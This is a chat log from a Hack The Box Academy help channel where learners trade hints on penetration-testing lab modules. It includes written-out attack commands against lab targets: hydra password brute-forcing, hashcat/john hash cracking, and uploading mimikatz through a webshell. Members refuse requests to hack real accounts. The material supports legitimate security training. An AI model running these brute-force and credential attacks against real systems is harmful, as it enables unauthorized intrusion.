Hi Khaotic, Can I please DM you regarding Whitebox Attacks (assuming you finished it!)?

Going through ffuf module, I've started the pwnbox or whatever that website Parrot VM instance is called. Can someone please tell me where do I get the IP and port to access:
http://academy.htb:PORT

Sure. I'm out running errands, but will respond when I get home

Ah... I can't DM you, as I can't add you 🙂

You should be able to DM me without adding it

Ah, nevermind, its privacy settings on my side I think

Hey I'm on https://academy.hackthebox.com/module/115/section/1139 Shells and Payloads Liveengagement. I'm using remmina to rdp into the host but the display is borderline unusable size. Dynamic resolution is greyed out. How can I change the resolution to a more reasonable size?

I'm messing up with the formatting or something

Linux services and internals enumeration - latest python version installed on the target

Have tried whereis, the command given in the section, which etc

Have you tried setting the size based on a % of your screen?

i.e. xfreerdp /size:90%h /v:10.129.2.174 /u:htb-student /p:'Academy_student_AD!'

Even getting interactive with the python3 and grabbing the version, the installed python packages versions etc

xfreerdp command not found. That's why I've been using remmina instead

If I could get xfreerdp to work I'd be happy using that, but I struggled with that in earlier modules and gave up

In Parrot OS, xfreerdp is not installed by default. But you can install it

sudo apt update
sudo apt install aptitude
sudo aptitude install freerdp2-x11

thank you, i didn't realise i need to install aptitude

https://www.reddit.com/r/debian/comments/vcpcpe/cant_install_freerdp_neither_freerdp2x11/

Can someone please tell me where the pwnbox shows target IP and port?

The PwnBox is browser-based. You do not need IP:Port

thanks for the link i needed to say no to the first solution, the second solution about dependancies solved it

I have to access admin.academy.htb:PORT for the challenge but I don't see that IP:PORT info anywhere and neither is it in etc/hosts file

Need your guidance bunny

I've become rusty or something

#modules message

You need the TargetIP, not the IP from the PwnBox. The PwnBox is your attacker machine.

Think about where software is installed. Then look in this directory.

Yes but where is this Target IP? I vaguely remember it showed target IP somewhere around/in the module last time I was doing this few months ago but I don't see Target IP anywhere now even after starting pwnbox

Ah man I'm dumb I thought it did that automatically when I started pwnbox. Thanks a lot 🙌🏻

On ACTIVE DIRECTORY ENUMERATION & ATTACKS > Privileged Access > Leverage SQLAdmin rights to authenticate to the ACADEMY-EA-DB01 host (172.16.5.150). Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt. : Am I supposed to retrieve SQLAdmin credentials (or hash) from the previous DCSync attack or should that be done another way ?

I didn't do it that way. Without spoiling, what can the SQLAdmin log into, which can be used for privilege escalation.

anyone facing problem with the pwnbox and the vpn?
am not able to ping the target and the pwnbox isnt accepting keyboard input

Formatting was fucking up, it was all about damn formatting

It has been in front of me, all the time

PwnBox doesn't need to be connected to the VPN since it's already connected to the HTB network. You might try selecting the "Full Screen" option for the PwnBox so it opens in a new tab if you're having input problems. Alternatively, you might try switching browsers.

Also don't be connected to the VPN and use the Pwnbox at the same time, neither will be able to connect then

tried running the vpn locally its not pinging the target, ill try another browser for the pwnbox thanks!

thanks will do that also

If the target that you have spawned has a port, then you cannot ping it

nevermind, I didn't read the question properly was thinking the SQLAdmin was a user but it's the "blodhound's right" thanks

Just saw an email about "Guided Mode" for HTB VIP, does anyone know if that feature will be implemented in Academy for the labs?

academy should already be "guided"

and skill assessments are well, skill assessments

https://academy.hackthebox.com/news/7-dec-2022

hello is someone availaible to unstuck me in "STACK-BASED BUFFER OVERFLOWS ON LINUX X86" module plz ?

Use lube

You need to more clear with your question.

lmao

according to my notes I first attacked ||tomcat with a war payload|| and did it manually but my notes also show attacking a social website 😐

Did you solve this?

@pine dagger i'm stuck at this Q: How large can our shellcode theoretically become if we count NOPS and the shellcode size together? (Format: 00 Bytes) - i've tried 'info proc mapping' in gdb , but can't find any clue.

Sadly, I dont have notes on that one from when I did it. However, the answer is literally in the text in the screenshots. You just to calculate it, based on the numbers they give you.

Thanks! I didn't know about that, I'll have to read up on how that works.

I'm talking about the Labs (Easy, Medium, Hard) that aren't guided.

where i can find room for dante from prolap?

https://academy.hackthebox.com/achievement/285625/115

Finally finished it

Well done.

I may have made a mistake and led you down the wrong path earlier but I have attacked what appears to be a facebook-like blog on my notes

??

Yes, thats host2

But thanks for helping(or trying to)

#prolabs-dante

they've mentioned that it'd only apply to retired, easy boxes.

you also said "Academy" so i got confused

how to jain access to this link

You need a Silver year subscription
If you answer a question incorrectly a few times, you can contact a mentor via Discord. He will give you hints. You still have to answer the question yourself.

Read and Follow #welcome

Yes mate, from there enumerate further

From windows?

Which user were you trying to log into that didn't work?

Skills assessments are about testing what you have learned. It is a kind of final exam for the module. If you get stuck there, you should work through the module again.

Delete that

Its too low resolution

You cant read it lol

Unless its just my phone xd

Its your phone

Oof

There's two answers clearly visible in the screenshot

I can't read much, I had to zoom in

💀

luckily for you I have proper notes on all of this except which user I used for login

try another user

You should also delete this screenshot. Or hide it behind spoilertags.
It contains references to a user.

I think I would be sharing spoilers, dm?

It contains a username
Usernames should always be placed behind spoilertags

Double |

Anyone avail to dm/dm me on White Box Attacks: User Enumeration via Response Timing? I get the gist of this module, but currently am ~23K out of a possible 650K user names enumerated -- with the lab having timed-out twice now just to get this far... would love some filtering to reduce the 650K potential usernames down to something more managleable. Got it -- Thx @pine dagger and @kind turret for the help

beginning and end

thats pipe not, l

|x2. Beginning, and end

https://www.howtogeek.com/803184/how-to-spoiler-an-image-on-discord/

password attacks labs take forever when bruteforcing

idk

hello i found all zones in DNS module of attacking common services, but i am stuck in this question "find all available DNS records for the inilanefreight.htb domain on the target name server and submit the flag" as i said i found all zones but seems that subbrute did not work for me i tried dnsenum, sublist3r and subfinder and look

can someone please help me

i echo all zones to the resolvers.txt fyi

and i tried without them

Bruteforcing some services takes long than others, as a general rule of thumb, avoid bruteforcing ssh unless you really have to.

yeah bud for ssh i normally use ncrack better but im into another service now

Did you add name servers to one of those text files you passed into subbrute?

yes i added them to the resolvers.txt

@rustic sage can i dm you ?

i dont want to make spoilers xdd

guys how to acces to worm gpt

Hello everyone, can someone help me with brute force assessment where we are to attack /login.php page? I tried multiple wordlists, and in the end I used the hint. But still no luck.
My script:
||hydra -l admin -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-75.txt -u -f 94.237.59.206 -s 54421 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=<form name='log-in'"||
Bruteforcing with rockyou.txt takes like 53 hours. What do I do wrong here?
Any advise or help will be much appreciated.

can somone please help me ?

Show me your /etc/hosts

And resolvers.txt

@quiet ember can i dm you ?

to avoid spoilers

https://academy.hackthebox.com/module/115/section/1139 I'm trying to add the exploit into metasploit, I can't just update because the foothold has no internet. I tried following https://www.amirootyet.com/post/how-to-add-new-exploit-to-metasploit/ but after I add the exploit in it still does not show up when I search. I did updatedb as well

Exercise link?

Search didn’t work for me either, but you can just do “use exploit/whatever/path/numbers”

I am still having trouble with the last question of the section of this module:

https://academy.hackthebox.com/module/22/section/150

command I typed:

"Get-ADUser -Filter * -SearchBase"OU=Pentest,DC=INLANEFREIGHT,DC=LOCAL""

Result:

Do we earn isc^2 credits for past completed modules ?

what is mean "our own cookie"

It doesn't say "our own cookie"... it does say "replace the cookie value with our own value" though

own value mean this

apparently that is an "earlier authenticated cookie". So you have logged in previously, saved your cookie, logged out and can now use that previous cookie to bypass authentication again. I think its just teaching you how cookies work.

DM

Trying to SSH with the key in the footprinting hard lab, but I am getting an error in libcrypto and permission denied message

already checked the key was copied with the BEGIN and END messages and did the chmod

Maybe the formatting is off?

I made sure there were no spaces

or lines after

Okay, so I guess you do need a blank line after, it worked now

i put name and value of the cookie and didnot work why?

Now access another page that isn't the login screen

Are you still stuck?

how?

Getting an error on footprinting hard

ERROR 2002 (HY000): Can't connect to MySQL server on '<IP>' (115)

This was my command: mysql -u tom -h <IP> -p

Used the same pw I used to get into imaps

Nevermind, apparently you have to use it in the ssh session

What I don't understand is why NMAP didn't show me a port for MySQL at the beginning.

I'm on documentation and reporting module on practice lab question 1, I got an error when I try to rdp to DC01, does anyone knows what cause any of this?

[19:19:59:185] [3084:3085] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[19:19:59:185] [3084:3085] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1```

please let me know if you know and thank you!

https://tenor.com/view/meme-our-now-gif-21036569

"our"

lol just a meme

https://tenor.com/view/its-done-frodo-lord-of-the-rings-elijah-wood-gif-8259334

Finished footprinting HARD lab!

Because it's only running internally

Makes sense, that's what I was guessing, just wasn't sure.

Are there any good footprinting techniques for scanning services like that once you're internal into and SSH session?

probably just linpeas or something?

netstat -tulnpa

Thanks!

Also just checking the user's bash history

Try surrounding the credentials in single quotes and including the domain name in the username:

xfreerdp /v:$IP /u:'DOMAIN\username' /p:'password'

As that will show a lot

Iirc one of the modules reveals root password

In user history

Yeah, the bash history definitely helped, the only reason I went right for that on this lab was because there wasn't much else in there so it was an easy move!

I've just been using ls -lah now, just like -vvv for scans and some other things

Might as well go with the nuclear option if there's a chance you have to use it anyway, lol

Not to say nations should follow that advice

؟؟؟؟؟؟؟؟؟

That would be bad

Its referencing a previously used valid cookie

i do it but also did not work

well it works but turns out I got the wrong credentials, do you know any other way to crack the ipmi hash correctly?

I already tried using john john --wordlist=/opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-75.txt crack.txt and hashcat hashcat -m 2000 -a 0 crack.txt /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-75.txt

or changing the wordlist with md5decryptor-uk.txt

wrong hash mode

what hash mode should I use?

hashcat --help | grep -i ipmi

okay thx

Great tip, I usually looked for this online lol

Youre welcome! hate to leave my terminal to find a hash mode on hashcat wiki lol

it did gave crack one, but it only crack the password not the user, tried to separate them but got error, or the user was actually the one in the kerberos file md after the domain?

Hi guys! I am on AD enum&attacks module, Skills Assessment Part 1. Whenever I try to upload chisel.exe it gives me that response. But I am able to upload for instance mimikatz, rubeus, etc...

Why can't I speak in serious discussion?

Sorry if this is the wrong place to ask*

#welcome

Thank you

are u using the browser's upload functionality?

antak webshell

yeah

if it is, yeah

i can upload the stuff like mimikatz etc

i faced the same issue back then. I think the filesize is too huge, so i used meterpreter to upload instead

but not chisel

that's an idea

tried using username from kerberos file md and password from hashcat, but I got this when I run xfreerdp More documentation is coming, in the meantime consult source files

may I dm you?

sure

I have a question on https://academy.hackthebox.com/module/160/section/1479 Web Service & API Attacks on the Server-Side Request Forgery (SSRF) section. This is the question given Can you leverage the SSRF vulnerability to identify port 3002 listening locally on the web server? Answer format: Yes, No . Its easy enough to figure out the correct answer, My question is can someone help me understand how I could modify the commands to actually test this? I have tried a bunch of methods but cannot seem to get it right. Exmaple command I have tried modifying is curl "http://<TARGET IP>:3000/api/userinfo?id=<BASE64 blob>" that part works fine, but figuring out how to make that tell me if 3002 is listening is what I cannot figure out.

Try and compare the responses if you try and request port 3002 versus something random like 6969

You might not see the exact output from 3002, but trying to access http://IP_ADDRESS:6969 returns an error because there just isn't a service listening there

So maybe we can't interact with port 3002 in the way we like (maybe we can only do stuff blind), but it's still enumeration and info about the server that can potentially help later on

I used hashcat

That is what I was trying, I will poke at it some more. Thanks!

Ok that is a good point, thanks!

https://academy.hackthebox.com/module/57/section/515 Thank you

Hey guys for the pivoting skills assessment, just wanted to know if I should be using ||WINPIVOT10 as a final pivot to get access to the DC or if its ok for me to just get the flag from the DC network drive||

Not sure if thats too spoilery but I'll remove if it is sorry

Hello, anyone can help with with Initial Enum of Domain in AD module

I found the host with ms-sql-a, yet im getting wrong answer

can anyone tell me why i cant post on community help?

Read and follow #welcome

Dm me

Are you trying to login as v*****?

This is from this module
PASSWORD ATTACKS
Theory of Protection

1. Something you know (a password, passcode, pin, etc.).
2. Something you have (an ID Card, security key, or other MFA tools).
3. Something you are (your physical self, username, email address, or other identifiers.)

Isn't an email address and username something you know?
because an email and password is still not 2fa in my opinion.

Thank you very much

Username and email is kind of awkward to put into a category here, because on one hand it's not really a form of protection as much but rather a representation what needs to be protected. On the other hand you can't get into an account without knowing what it is.

When talking about the "you are" category, I would generally associate it with stuff like biometrics (e.g. fingerprinting, retina scans, voice pattern, etc.)

Yeah I was logged in as v on ||WINPIVOT10, but I wasn't sure if this was the last machine or if I needed to use it as a pivot to get to the DC||

but they have taught me everywhere that a username is something you know and a password is something you know. and because you use 2 x something you know it is 1fa. for example if you use a phone (something you have) and face id (somethin you are) it is 2fa

So you got the flag now?

then just leave it at being something you know

yeah I got it through accessing the ||DC network share available on WINPIVOT10||

i will do 🙂 thx

The sole purpose of categorization is to make things make sense to our monkey brains, so as long as it's internally consistent it's fine. Probably worth mentioning in #858470491676737536 .

Well done.

thanks! I wasn't sure if that was the correct way since I felt like I had to keep practicing pivoting for the exercise ahaha

that was it

sweet as, cheers

Anyone willing to compare notes for the "Living off the Land" exercises in AD Enum and Attacks (https://academy.hackthebox.com/module/143/section/1360) ?

sorry, I thought you where referring to a different module, my mistake

No problem. Does HTB have any support team for such cases? Couldn’t find it on the website 😦

Follow up question for the one who solved this one: what wordlist have you used? Link: https://academy.hackthebox.com/module/57/section/515

Hi, Attacking common apps- attacking joomla,. I found the flag_647..... with cve-2019-10945.py exploit but how can I read it? Tried ,, type'' and ,,more'' commands, ls, cat.. nothing works, only dir. What am I doing wrong? Thanks

I think silver annual subscribers get support on modules from staff, otherwise you'll have to keep asking in here

Hehehe.

since it's in the root directory you can just browse to read it

Oh thanks yes a curl solved it 😅

Has anyone solved console password attacks ?

please can someone help I'm on passwords mutation section of password attacks module hashcat only generate 8 passwords why?

commands ran: hashcat --force /home/kali/Downloads/Compressed/Password-Attacks/password.list -r custom.rule --stdout | sort -u > mut_password.list

hydra -l sam -P /home/kali/mut_password.list ssh://10.129.134.196

I need help ?!
First method of file transfer module is not working when I tried to use it my virtual windows machine

I guarantee base64 string is true, i don't know why it is not working

that is part of the Skills Assessment but hint there is ||default cred|| and yes if you have silver annual you will have 1 on 1 tutoring

this should be the right command make sure the password list and rule are both from the resource

For this module I am working with the host linux machine right? https://academy.hackthebox.com/module/22/section/157

When I type out this command this is what I get:

"python3 ldapsearch-ad.py -l 10.129.42.188 -t info
"

how can you didn't figure out the tool isn't in your home directory?

either download the tool from github or use the existed version is /opt/ldapsearch-ad/ldapsearch-ad.py

Hello, sorry to interrupt the conversation, my Facebook account was hacked, is there someone who can help me free of charge. I beg if there is contact me.

read the #rules this is a cyber security learning platforms not a hacker for hire forum keep asking for thing like that and you will get the 👢 from one of the mod

Sorry, I forgot

Hello i'm on Kerberos Attacks Skills Assessment complete the first 3 question but i'm lock at the final one. I try to connect to the machine with psexec.py but every time I try i get an connection refused.

Think about where you need to psexec, what is the machine you need to access and from where you are accessing it

is therer a way to use bloodhound-python with pass the hash?

I am trying to find it but I cannot find anything about pth or ptt

Error: Exiting with code 1

What is this guys

I got an error on documentation and reporting module reporting lab sections, when I try to do xfreerdp /v:IP /u:'DOMAIN\USERNAME' /p:'PASSWORD' I got this kind of error ```[09:00:45:056] [3029:3030] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[09:00:45:056] [3029:3030] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[09:00:45:056] [3029:3030] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1

anyone knows whats wrong?
thank you

bloodhound does a bunch of LDAP queries to gather information, so I don't think so

Unless there's some way to auth to LDAP with a hash, which I doubt

Module Name Attacks Password

could be a bad password (use single quotes around the password to escape special characters), you also might just need to wait a little bit longer for machines to boot up if you're doing it when it started

Thanks

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1

Do you know the problem I did not find the flag ?

have you finished this module? can I dm you for more?

Not right now, a bit busy with something

Ok

You, my friend, need to relax, I wasn't talking to you just yet

Does anyone know what the problem is

I literally don't know what your problem is because you've been copying and pasting a single line from your error instead of sending screenshots of your terminal to give actual context

Also relax with the messages, someone will help you if they want to. While you wait, why not take a small break, or try doing some troubleshooting of your own with google?

see private

Here I can not send pictures of the problem

ok just asking, when I'm trying to crack the ipmi hash kusing hashcat, why do I got this? 5768797002000000e05179a2382122e7500df7c9949a89f08a1987132dd0f48fe2e1d37238c7448fa123456789abcdefa123456789abcdef140541444d494e:a60c216003306640422c8855b290c32c53319e5a:SPOILER aren't I supposed to get the username to or is there something wrong with this syntax? hashcat -m 7300 -a 0 crack.txt /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-75.txt

syntax looks fine, you might want to try using the full rockyou.txt just in case

I think I might have used john but not sure

thats just hashcat being hashcat

so it's better to use john? any suggestion to use it on ipmi hash?

what do you guys think

Like many others I am stuck on Attacking Common Services - Easy. Found the username, but have had no success in brute force so far. Why the F do they provide a password list if it does not work on any service!?

Any help much appreciated! I guess I am wasting a lot of time here...

probably cause of this

if the mutated pw list dont work, try the standard rockyou.txt

That helps

but even without reading that "Note", read the output of the terminal. Looks like the most doesn't do it

I am already running rockyou for hours...
I am using this command: ||hydra -t 64 -l f**** -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -f 10.129.191.39 smtp||

anyony know what the syntax to use john the ripper cracking an iphi hash?

Working on the Password Attacks - Attacking LSASS....issue is this: using the move method as per instructions is not working. Has anyone else had this issue? The SMB server share wasn't working in the prev module either

make sure u also add the email domain to the obtained username

hello guys, i enrolled in the networking module, it said it is a fundamental module,but i feel there are a lot of prerequisites to have and concepts that are not defined , do i have to finish a particular course before this one ?

what do you need to "move"?

trying to move the lsass.dmp file

what format should I use for ipmi hash in john?

@fiery berry trying to move the lsass.dmp file

there are many ways you can achieve that, have you done the file transfer module?

yes

@fiery berry yes already done that module, the issue is that I get a permissions error

are you using the pwnbox and try to transfer via impacket-smbserver?

@fiery berry yes tried that, getting permissions error

you can do it in a world writable folder like "/tmp" or just use xfreerdp to mount a shared folder

anyone?

could you give some examples or the concepts?

https://academy.hackthebox.com/module/39/section/407 can anyone help with this metasploit practical module? i cant figure out how to exploit the druid service

which mfs module are you using?

payloads

name?

Using the Metasploit Framework

that?

yes I know, but aren't there's supposed to be the user or not? or the user is ADMIN or administrator or that user from file 1?

sorry, probably I didn't explain the way I wanted. The exploit name I meant

ohh

|| 0 auxiliary/gather/zookeeper_info_disclosure 2020-10-14 normal No Apache ZooKeeper Information Disclosure||
this is just an info disclosure, im not sure if it has usefull info but it did work

||0 exploit/linux/http/apache_druid_js_rce 2021-01-21 excellent Yes Apache Druid 0.20.0 Remote Command Execution|| and i couldnt get this to work at all

||2181/tcp open zookeeper Zookeeper 3.4.14-4c25d480e66aadd371de8bd2fd8da255ac140bcf (Built on 03/06/2019)|| this is the zookeeper version

probably isn't correct, if you run info should give you more information about it

you should look for "druid"

that is the second exploit i used, i think it should work but it isnt, ill keep trying that and come back if i cant figure it out, thanks

colon?

did you set all the options correctly?

already tried that before, still doesn't work

TARGETURI / yes The base path of Apache Druid
should this be changed, to a more specific directory?

only lhost and rhosts should do the work

How to find flag in password attacks console

Does anyone know ?

Please help me

is the "password attack" the module you're working on?

when they talk about the different topologies of networks they introduce new words without defining them like , "TUN adapter ", "routing table","firewalls", they assume that i know these concepts but i don't!

Yess

.

section and question?

[!] Cannot reliably check exploitability. should i get this message if im using the right exploit

even in the first page they talk about /24 subnet ext

maybe not sure, just try and see how it goes

Any idea on how to read the data i have tried but couldn't

I sent you a private

these are fairly simple, for instance a firewall is just controlling what traffic enters and exits a network. You should be able to look them up and understand them after a quick search. more complicated topics i assume would be explained 🙂

it could be assuming you know more tbf, this is a type of subnet mask. just think of it as homework i guess. if you want help you can dm me and ill try to explain anything i can.

im still learning about networking so would be interesting to go through and solve prolems

ok, thanks i will try that .you see, I am more accustomed to learning with textbooks,where each word introduced is defined.

ok thanks a lot brother!

At C:\Users\a\Desktop\DomainPasswordSpray.ps1:261 char:21
+         Write-Host "$Message: Waiting for $($Seconds/60) minutes. $($ ...
+                     ~~~~~~~~~
Variable reference is not valid. ':' was not followed by a valid variable name character. Consider using ${} to
delimit the name.```
do anyone knows how should i avoid this error message? its official .ps1 file from repo, and i cant import it to module's machine

Well It says that you have a mistake a the line 261 of you're DomainPasswordSpray.ps1 file

Consider using ${} to
delimit the name.

Have you tried

Write-Host "${Message}:Waiting for...

it worked when i used /opt/Empire/empire/server/data/module_source/credentials/DomainPasswordSpray.ps1, but hasnt worked from official github repo, so idk, but working

Well if it's working you don't have any trouble, if you want to fix it for everyone, you could fork the github and do a pull request

Hey Guyz. I dont get something in the information gathering module/ Active subdomain enumeration https://academy.hackthebox.com/module/144/section/1256

Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer.

How do we define a DNS zone, is that the number of available adresses by doing AXFR transfer ?

add a single space after the "$Message" variable
https://github.com/dafthack/DomainPasswordSpray/issues/31

Hello, can somebody give me a nudge towards the answer for the following:

Module: Password attacks
Section: Password mutations
Question: Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the SSH password for the user "sam"

I've tried several methods, but I cannot brute the password before the expiration of the target machine.
Currently trying: hydra -l sam -P cut_mut_password.list ftp://10.129.186.213 -t 64 (I've cut the first 17k lines from the wordlist as suggested here and even tried with words starting B, and also opted for ftp brute forcing rather than ssh with no luck)

leave out -t64.
Your command should work as long as you have not removed the password from the list.

May I show you the first couple of lines of my file to make sure it's the right one ?

your pw list should be sorted alphanumerically, whats the first entry in your list?

I do not have the list anymore.

should finish very quickly if you remove 17k lines I think

But with the reduced list you should get the result relatively fast.

I have sent it to your DM

I did that and now it start with B

Yes, I checked my notes again

quick question, im almost done with linux fundamentals. where should i go next?

maybe windows fundamentals

okay, thanks!

I have just found it thank you @tranquil axle & @acoustic owl

You can follow this Path
https://academy.hackthebox.com/path/preview/information-security-foundations

Find a user with unconstrained delegation who is also part of the Protected Users group

Could this coand play a role : "'python3 /opt/ldapsearch-ad/ldapsearch-ad.py -l 10.129.42.188 -t info'
"

Another tool was described in the module. Try it with this one. Look in the help and see how you can enter the marked parts of the question.

sure, send me a dm

Any hacking tips?(mobile)

Need it for a revenge on the dud spiting on me and few more

Not what this server is for

• illegal

Dang it

use a computer

hi, I want to hack the game Roblox

read #rules

But they want to hack Roblox, not read the rules

the eternal struggle

Yes, rules are silly, I know. But they can protect you from get a 👢

How is that responder when gaining foothold caught another users than Inveigh module ran from inside Domain?

hello dear friends, i am at AD Enumeration & Attacks - Skills Assessment Part I, i am at MS01 as user sv***, i am searching the files at the cleartext pass to user t** but cant find it anyway, am i at the right bath?

Not the right path, try some techniques taught in the module to harvest credentials and such

ok thanks, the question was tricky

Hello is anyone out there decent with MSSQL Studio syntax? I'm having trouble incorporating a WHERE clause in my SQL query. I've tried many iterations but keep coming up with invalid column name. I've verified I can use the WHERE clause on the id column but having trouble with name. Anyone else run into this?|| /****** Script for SelectTopNRows command from SSMS ******/
SELECT TOP (1000) [id]
,[name]
,[password]
FROM [accounts].[dbo].[devsacc]
WHERE [accounts].[dbo].[devsacc].name=("HTB")||

lol wow nvm

Used single quotes and removed the parentheses and it worked 🙂

It works with parentheses too, haha single vs double quotes gets me in trouble, I should probably learn why 😄

Hi all, I’m really stuck on the pen testing path. I’m on the Attacking Common Services module, specifically the attacking SQL section. I can’t for the life in me work out how to get the password for the mssql user as question 1 asks for. I can connect to the server with sqlcmd as htbuser, I can view the tables but cannot see any hashes for users. Clearly overlooking something. Can anyone help please? Thank you 👍

what other methods did the module teach you?

That’s where I’m struggling, I’m following the module content but not helpful

I’m after some pointers not the answer

As the cheat sheet isn’t helping

its kinda hard to give a pointer without giving away the answer

Hey guys, currently doing the FFUF introduction module. Does anyone know how to get rid of the junk results from the output

but you are right, its not in the cheatsheet

oh it actually is in the cheatsheet

i take that back

Ok. Shall re re re read it

Thank you

I can tell you the chapter name if you want?

Yes please

Capture MSSQL Service Hash

look the flags you can use, there are a couple different ways to filter results

Ok, I'll look into that. Thanks

theres one flag specifically for comments in wordlists

Ok I got it now. This flag was mentioned earlier but it didnt register in my head that its used with ffuf

Thanks for leading me to the right path!

Im trying to install crackmapexec on my htb ParrotOS vm but I cant get it done with the code example in the section sudo apt-get -y install crackmapexec

Ive looked for answers on the web and on crackmapexec's website but I am still unable to install it.

The error message that I get with apt-get he following packages have unmet dependencies:
crackmapexec : Depends: python3-lsassy but it is not installable
Depends: python3-neo4j but it is not installable
Depends: python3-pypsrp but it is not installable
And i cant seem to install then manually either.

Anyone know how I might be able to fix it?

Did you check github?

yup, When I follow the instructions under the Python package section python3 -m pip install pipx i get the output in the screenshot

Try this - sudo apt install -y python3 python3-pip python3-venv libssl-dev libffi-dev build-essential
this will install you any missing dependencies before the installation of crackmapexec

check and tell me

This should be solved after the installation of the dependencies

Wish it worked

Did you clone the crackmapexec?

I did clone it, the Folder has been created in my home directory

anyone can help with pwd medium lab pls? I have got users, struggling after ||opening doc file||

May I tell you the set of commands from the beginning? lets try

I'm all ears

Check the update - sudo apt update

then use this to install the missing dependencies: sudo apt install -y python3 python3-pip python3-venv libssl-dev libffi-dev build-essential

Clone the crackmapexec: sudo apt install -y git

clone repository: git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec

change directory: cd CrackMapExec

Install CrackMapExec and required Python packages:

pip install -r requirements.txt
python setup.py install

This should work

Type cme to check whether it is installed properly

pip install -r requirements.txt

I think my VM is just thoroughly broken

Did you running all the cmds above without error?

I think I had the same issue and after following the second solution here it worked for me https://stackoverflow.com/questions/73830524/attributeerror-module-lib-has-no-attribute-x509-v-flag-cb-issuer-check

I could run them up until "pip install"

you had the same error?

trying it now

After doing as the 2nd answer suggested, should I run sudo apt-get -y install crackmapexec
?

Do the pip install -r requirements again

It worked... or atleast didn't break. Ill try the last few commands Alyosha said

I dont seem to have the setup.py file

Did you setup virtual environment before installing the package?

dont think so

use this for setting up virtual environment: python3 -m venv venv
source venv/bin/activate

and then use - python setup.py install again

Still the same

try running cme and tell me what it shows

command not found

for both cme -h and crackmamexec -h

I see

some dependencies and packages can change

python3 -m venv venv
source venv/bin/activate - this cmd didnt work?

Those 2 works

and creates a venv

Their github suggests using
#~ python3 -m pip install pipx
#~ git clone https://github.com/mpgn/CrackMapExec
#~ cd CrackMapExec
#~ pipx install .

Its doing something

something good...

its ALIVE

Nice

Thanks @tranquil axle & @sudden snow for the help.

Yea I remember having issues with that too

im writing the steps down

No problem.

i can't do the easiest part , im doing the shells&payloads module , at the Laudanum part , i already uploaded the payload and gained acess to the system and it asked for me to ||submit the path i land in || , i already did it , but the second question is ||Where is the Laudanum aspx web shell located on Pwnbox? Submit the full path. (Format: /path/to/laudanum/aspx) || i cant just find it , i did all the work in my linux so idk where it is located in the pwnbox , someone can give me a hint or just say where it is?

iirc one of the code blocks in the section has the path

the code block from the .aspx?

oh in the page

let me see

my pwnbox just died xd

i want hacking tools for debian

because iam working a opreating system by debian

The one for Move a Copy

yeah already did it , thanks : )

and one more thing if you can help me

where's the "Browser's network settings menu" located in burpsuite?

I'm doing the Windows Fundamentals module and on the question "Which Windows NT version is installed on the workstation? (i.e. Windows X - case sensitive)" in the first section, but the target is on Win 10.

Not too sure. But I think you can ignore it for the most part and just launch the browser from the Proxy>intercept menue

it is saying that i need to disable the sandbox , idk if it is going to interfer a lot but i will do what the burpsuite it's saying xd

sounds like a good idea.

it just crashed my vm XD

I need to watch a refresher on burpsuite and all its settings and stuff. can't remember them for the life of me.

GL HF

im joking xd , but it didnt supported the browser and crashed

i gaved it more 10 gb of ram rn

to see if it helps

XD

Can anyone confirm if they're able to reach Splunk in Attacking Common Applications: Splunk - Discovery & Enumeration?

I keep getting connection resets, and I haven't been told that there's a specific vhost that needs to be visited. PRTG Network Monitor on 8080 works fine.

||https://cdn.discordapp.com/attachments/1125919513599283292/1133160901466390658/image.png||

this is what happens when i open the browser XDDD

can't i put it in foxy proxy?

so it doesnt crash the machine

no idea. never used it before

Try enumerating the target.

Its not on 8080

I didn't say it was on 8080

I know you didn't 🙂

Am just commenting that it wasn't in case you were trying that

Port 8000 is open, but I'm not getting anything when I try to open it in the browser

Trying with http or https?

It was an HTTPS issue

thanks!

Yeah, not everything redirects from http to https.

typing http is muscle memory after doing enough HTB 😅

Ho ho ho

hi, i'm on documentation and reporting module practice lab sections question 1
I'm able to find a credentials in h8 weak password md file, but when I use:
xfreedp /v:172.16.5.5 /u:USER@inlanefreight.local /p:PASSWORD it failed, anyone know what's wrong?

At a glance, you missed the r in xfreerdp. I haven't done the module, but you could try moving moving the domain to /d: instead of @ or just try without it altogether

okay

still doesn't work though

Can you post a screenshot of the output?

Well are you doing it through your vm or through a foothold box?

And have you set up a pivot/port forward if so

You get this one figured out? I've been trying everything from creating fake smb server (capture hash) to alternative mssql login methods. with the responder and smb share method, nothing responding when I exec dirtree in sql. LIke you, and i'm sure others, i'm definitely overthinking and overlooking this step.

Hi guys! I'm currently doing the footprint modules and going through the first easy lab of the module... but I got a questions that I'd like to know if someone can help me with...

there are other ways to capture hash, use what the module teaches you

when scanning the server I get these services

I can't upload pictures for some reason here :/

But I have ProFTP services on TCP 21 and 2121

the module gives me a login account which works

but everytime I try to dir or ls the directory I get

ftp> ls
227 Entering Passive Mode (10,129,42,195,128,3).
150 Opening ASCII mode data connection for file list
226 Transfer complete

and it does not show anything

does anyone knows what is happening that causes this issue?

obs: I also tried without passive mode

Yea, I'm looking at the module. I research tweaks to the commands, but nothing responding. I'll keep trial and error on it till it clicks. One thing I'm liking about not getting it right away is it makes it make sense in the end. At least I know the capture hash is the step to work on. Thanks.

oh... this is silly... I did not know you could ls -la as an FTP command :/ Thanks!

I just got it..wow. that step took me a bit. Not quite quite sure, but i think i was using the target IP on one of the commands versus the vm IP. wiping forehead now. Think I can get thru the rest easier. Thank you!!

The vm htb

What's that?

